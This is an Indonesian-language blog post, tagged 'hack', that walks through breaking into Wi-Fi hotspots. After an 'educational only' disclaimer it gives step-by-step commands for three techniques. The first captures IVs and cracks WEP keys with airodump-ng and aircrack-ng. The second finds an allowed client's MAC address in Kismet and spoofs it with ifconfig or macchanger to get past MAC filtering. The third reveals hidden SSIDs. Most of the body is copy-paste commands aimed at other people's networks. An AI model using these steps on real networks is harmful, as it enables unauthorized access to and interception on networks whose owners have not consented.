Informasi dan Pengetahuan yang terkandung disini diperuntukan sebagai pembelajaran semata.
Bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang
melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berhadapan
sendiri dengan aparat penegak hukum.
Ada tiga (3) objektif / tujuan teknik yang akan di terangkan disini, yaitu,
Teknik membobol WEP
Teknik membobol MAC filter.
Teknik melihat Hidden SSID
Asumsi
Chipset Wireless yang digunakan adalah Intel, seperti, ipw2200. Kalau anda cukup beruntung
menggunakan chipset Atheros anda dapat melakukan hal-hal yang lebih dahsyat.
Aplikasi yang perlu disiapkan.
Beberapa paket software yang dibutuhkan
# apt-get install gcc g++ linux-kernel-headers libpcap0.8 libpcap0.8-dev \
libnet1 libnet1-dev libdnet libdnet-dev subversion python2.4 \
python2.4-dev python-pyx python-crypto python-psyco dhcp3-server \
bind9 apache2
Install beberapa aplikasi yang lebih fokus untuk hacking wireless
# apt-get install kismet scapy macchanger ettercap dsniff aircrack-ng
Scanning Hotspot
Scanning Keberadaan HotSpot dapat dilakukan menggunakan text mode.
iwlist
Cara yang paling sederhana adalah menggunakan perintah
# iwlist scanning
Kismet
cara yang lebih rumit menggunakan kismet
# apt-get install kismet
# vi /etc/kismet/kismet.conf
source=none,none,addme --> source=ipw3945,wlan0,ipwsource
source=none,none,addme --> source=zd1211,eth1,zysource
Baca http://www.kismetwireless.net/documentation.shtml untuk melihat source yang dikenali Kismet
# kismet
airodump
Mematikan mode monitor di WLAN interface eth1
# airmon-ng stop eth1
Mengaktifkan mode monitor di WLAN interface eth1
# airmon-ng start eth1
Scanning melalui WLAN interface eth1
# airodump-ng eth1
Menjebol WEP menggunakan airodump dan aircrack
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik berikut ini
membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang
melakukan transfer file di jaringan HotSpot. Jika tidak ada traffic sama sekali, sampai kapanpun akan
susah untuk di crack WEP-nya.
Kita perlu mencatat tiga (3) hal, yaitu,
(1) BSSID / MAC Addresss AP
(2) MAC address WLAN kita
(3) Channel yang digunakan AP.
Misalnya,
1.BSSID 00:30:4F:4E:2B:50
2.WIFI 00:11:6b:33:d3:90
3.CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan
# export AP=00:30:4F:4E:2B:50
# export WIFI=00:11:6b:33:d3:90
# export CHANNEL=1
Jalankan airodump di WLAN eth1
# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1
Jalankan aircrack untuk mengcrack WEP
# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs
Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang
sedang transfer file di jaringan HotSpot.
Melewati Pembatasan Mac Address
Sebagian AP akan memfilter MAC address client. Teknik menemukan MAC address client yang diijinkan lewat oleh AP menggunakan Kismet adalah
# kismet
Lakukan space
S - untuk men-sort
S - untuk men-sort terhadap SSID
Panah Bawah - Letakan di SSID AP yang kita inginkan.
ENTER - detail AP
C - lihat siapa saja & MAC address client AP tersebut
Pastikan airmon tidak aktif di WLAN eth1
# airmon-ng stop eth1
Untuk mengubah MAC address dari WLAN di eth1 menjadi sama dengan MAC address client yang diijinkan AP
# ifconfig eth1 down
# ifconfig eth1 hw ether 00:16:CF:C1:FA:F5
# ifconfig eth1 up
Alternatif lain
# ifconfig eth1 down
# macchanger -mac 00:16:CF:C1:FA:F5 eth1
# ifconfig eth1 up
atau untuk random MAC address
# macchanger -r eth1
Menemukan Hidden SSID
Cara yang paling ampuh untuk menemukan Hidden SSID adalah menggunakan kismet
# kismet
Hidden SSID akan berwarna biru dan di tutup oleh tanda <>.
---------------------------,end, ---------------------------
Label: hack
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar